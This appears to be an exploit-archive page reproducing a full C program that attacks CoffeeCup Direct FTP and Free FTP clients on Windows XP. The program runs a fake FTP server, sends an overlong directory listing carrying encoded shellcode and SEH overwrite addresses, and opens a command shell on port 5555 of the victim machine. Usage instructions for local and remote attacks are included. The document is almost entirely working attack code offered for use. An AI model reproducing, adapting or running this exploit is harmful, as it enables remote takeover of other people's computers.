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CoffeeCup FTP Clients (Direct <= (Free <= BoF Expl
========================================================================= CoffeeCup FTP Clients (Direct <= (Free <= BoF Exploit ========================================================================= /************************************************************************************* CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit created by Komrade e-mail: unsecure(at)altervista(dot)org web: http://unsecure.altervista.org Tested on: CoffeeCup Direct FTP CoffeeCup Free FTP on a Windows XP Professional sp2 operating system. This exploit creates a fake FTP server on your machine, waiting for the connection of an FTP client. After the exploit is sent a shell (command prompt) is spawn on port 5555 of the target machine. This exploit works locally or remotely. Usage: coffecupbof [direct | free] [-l] [-r server IP] Options: direct | free "direct" to exploit a CoffeeCup Direct FTP client "free" to exploit a CoffeeCup Free FTP client -l executed locally -r serverIP executed remotely. You need to specify the address of the FTP server for the PASV command (Insert your IP address) Examples: C:\> coffeecupbof direct -l exploit for CoffeeCup Direct FTP executed locally C:\> coffeecupbof free -r exploit for CoffeeCup Free FTP executed remotely *****************************************************************************************/ #include <stdio.h> #include <string.h> #include <windows.h> #include <winsock.h> #define FTP_PORT 21 #define PASV_PORT 1106 int version, wait = TRUE; DWORD WINAPI fileList(LPVOID data); int main(int argc,char **argv){ SOCKET sock, client; struct sockaddr_in sock_addr,client_addr; WSADATA data; WORD p; char mess[4096], received[512], addr[32]; int lun, n, i, err; HANDLE fileListH; DWORD fileListId, exitCode; p = MAKEWORD(2, 0); WSAStartup(p, &data); printf("------------------------------------------------------------------------------\r\n"); printf("\tCoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit\r\n"); printf("\t\t\tcreated by Komrade\r\n\r\n"); printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n"); printf("\t\tweb: http://unsecure.altervista.org\r\n"); printf("------------------------------------------------------------------------------\r\n\r\n"); if (((argc != 2) || (strcmp(argv[1], "direct") != 0) || (strcmp(argv[1], "free") != 0)) && ((argc != 3) || (strcmp(argv[2], "-l") != 0)) && ((argc != 4) || (strcmp(argv[2], "-r") != 0))){ printf("Usage: coffecupbof [direct | free] [-l] [-r server IP]\r\n\r\n"); printf("Options:\r\n"); printf(" direct | free\t\"direct\" to exploit a CoffeeCup Direct FTP client\r\n"); printf(" \t\t\"free\" to exploit a CoffeeCup Free FTP client\r\n"); printf(" -l\t\tworks locally.\r\n"); printf(" -r server IP\tworks remotely. You need to specify the address of the\r\n"); printf("\t\tFTP server for the PASV command (Insert your IP address)\r\n\r\n"); printf("Examples:\r\n"); printf(" coffeecupbof direct -l\t\texploit for CoffeeCup Direct FTP\r\n\t\t\t\texecuted locally\r\n"); printf(" coffeecupbof free -r\texploit for CoffeeCup Free FTP\r \n\t\t\t\texecuted remotely\r\n"); return 0; } if(strcmp(argv[1], "direct") == 0) version = 1; else version = 2; if(strcmp(argv[2], "-r") == 0){ char *token[4]; token[0]=strtok(argv[3], "."); for(i = 1; i < 4; i++){ token[i]=strtok(NULL, "."); } strcpy(addr, "\0"); for(i=0; (i < 4) && (token[i]!= NULL); i++){ strlcat(addr, token[i], 16); strcat(addr, ","); } } else strcpy(addr, "127,0,0,1,"); sock=socket(PF_INET,SOCK_STREAM,0); sock_addr.sin_family=PF_INET; sock_addr.sin_port=htons(FTP_PORT); sock_addr.sin_addr.s_addr=INADDR_ANY; err = bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in)); if (err < 0){ printf("Error in bind(). Port may be in use\r\n"); return -1; } err = listen(sock,1); if (err < 0){ printf("Error in listen()\r\n"); return -1; } lun = sizeof (struct sockaddr); printf("Opening the FTP port and waiting for connections...\r\n"); client = accept(sock, (struct sockaddr*)&client_addr, &lun); printf("Client connected from IP: %s\r\n\r\n", inet_ntoa(client_addr.sin_addr)); strcpy(mess, "220 CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit\r\n"); n=send(client, mess, strlen(mess), 0); if (n < 0){ printf("Error in send()\r\n"); return -1; } while(wait == TRUE){ Sleep(800); n = recv(client, received, sizeof(mess), 0); if (n < 0){ printf("Error in recv()\r\n"); return -1; } received[n]=0; printf("CLIENT: %s", received); if (stricmp("USER", strtok(received, " ")) == 0) strcpy(mess, "331 Anonymous access allowed, send password.\r\n"); else if (stricmp("PASS", strtok(received, " ")) == 0) strcpy(mess, "230 Anonymous user logged in.\r\n"); else if (stricmp("PWD\r\n", received) == 0) strcpy(mess, "257 \"/\" is current directory.\r\n"); else if (stricmp("CWD", strtok(received, " ")) == 0) strcpy(mess, "257 \"/\" is current directory.\r\n"); else if (stricmp("TYPE", strtok(received, " ")) == 0) strcpy(mess, "200 Type set to A.\r\n"); else if (stricmp("PASV\r\n", received) == 0){ fileListH = CreateThread(NULL, 0, fileList, NULL, 0, &fileListId); if (fileListH == NULL) printf("Error in CreateThread() %d", GetLastError()); wsprintf(mess, "227 Entering Passive Mode (%s4,82).\r\n", addr); } else if (stricmp("LIST", strtok(received, " ")) == 0 || stricmp("LIST\r\n", received) == 0){ strcpy(mess, "125 Data connection already open; Transfer starting.\r\n"); printf("SERVER: %s\r\n", mess); n=send(client, mess, strlen(mess), 0); if (n < 0){ printf("Error in send()\r\n"); return -1; } wait = FALSE; do{ GetExitCodeThread(fileListH, &exitCode); Sleep(100); } while(exitCode == STILL_ACTIVE); printf("< Long file name sent to client >\r\n\r\n"); strcpy(mess, "226 Transfer complete.\r\n"); } else strcpy(mess, "550 Unimplemented\r\n"); printf("SERVER: %s\r\n", mess); n = send(client, mess, strlen(mess), 0); if (n < 0){ printf("Error in send()\r\n"); return -1; } } printf("Wait......."); Sleep(2000); printf("Exploit succesfully sent!\r\n"); printf("Connect to %s port 5555 for the shell\r\n", inet_ntoa(client_addr.sin_addr)); closesocket (client); closesocket(sock); WSACleanup(); return 0; } DWORD WINAPI fileList(LPVOID data){ char shellcode[] = "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA\xEB" "\x05\xE8\xEB\xFF\xFF\xFF\x70\x99\x98\x99\x99\xC3\xFD\x12\xD8\xA9\x12" "\xD9\x95\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12" "\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8" "\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E" "\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A" "\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12" "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71\xE5" "\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3\x9D\xC0" "\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x69\x12" "\x41\x5E\x9E\x9B\x99\x8C\x2A\xAA\x59\x10\xDE\x9D\xF3\x89\xCE\xCA\x66" "\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66\xCE\x65\x1A\x75\xDD" "\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B\x62\x10\xDF\xA1\x10\xDF" "\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99\x99\x14\xDE\x89\xC9\xCF\xCA" "\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9" "\xCA\x66\xCE\x7D\xC9\x66\xCE\x71\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB" "\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66" "\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB" "\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED" "\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8" "\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA" "\xF2\xFC\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99" "\xF8\xFA\xFA\xFC\xE9\xED\x99"; char shelljump1[] = "\x90\xEB\xBA\x90"; char shelljump2[] = "\x58\xB9\x21\xFC\xFF\xFF\xF7\xD1\x2B\xC1\xFF\xE0\xE8\xEF\xFF\xFF\xFF"; char SEHAddr1[] = "\x50\x39\x06\x6D"; char SEHAddr2[] = "\x0D\xA8\x03\x6D"; SOCKET sock, client, list; struct sockaddr_in sock_addr,client_addr; WSADATA wData; WORD p; char mess[4096]; int lun, n, i, err; p = MAKEWORD(2, 0); WSAStartup(p, &wData); sock=socket(PF_INET,SOCK_STREAM,0); sock_addr.sin_family=PF_INET; sock_addr.sin_port=htons(PASV_PORT); sock_addr.sin_addr.s_addr=INADDR_ANY; err = bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in)); if (err < 0){ printf("Error in bind(). Port may be in use\r\n"); return -1; } err = listen(sock,1); if (err < 0){ printf("Error in listen().\r\n"); return -1; } lun = sizeof (struct sockaddr); client = accept(sock, (struct sockaddr*)&client_addr, &lun); while (wait == TRUE) Sleep(100); strcpy(mess, "03-04-81 12:00PM 3 "); for(i=strlen(mess); i<100; i++) mess[i]=0x90; mess[i]='\0'; strcat(mess, shellcode); for(i=strlen(mess); i<1000; i++) mess[i]=0x90; mess[i]='\0'; strcat(mess, shelljump2); for(i=strlen(mess); i<1079; i++) mess[i]=0x90; mess[i]='\0'; strcat(mess, shelljump1); if (version == 1) strcat(mess, SEHAddr1); else strcat(mess, SEHAddr2); for(i=strlen(mess); i<1300; i++) // cause the exception mess[i]='b'; mess[i]='\0'; strcat(mess, "\r\n"); n = send(client, mess, strlen(mess), 0); if (n < 0){ printf("Error in send()\r\n"); return -1; } closesocket(sock); closesocket(client); WSACleanup(); return 0; } # 0day.today [2024-12-26] #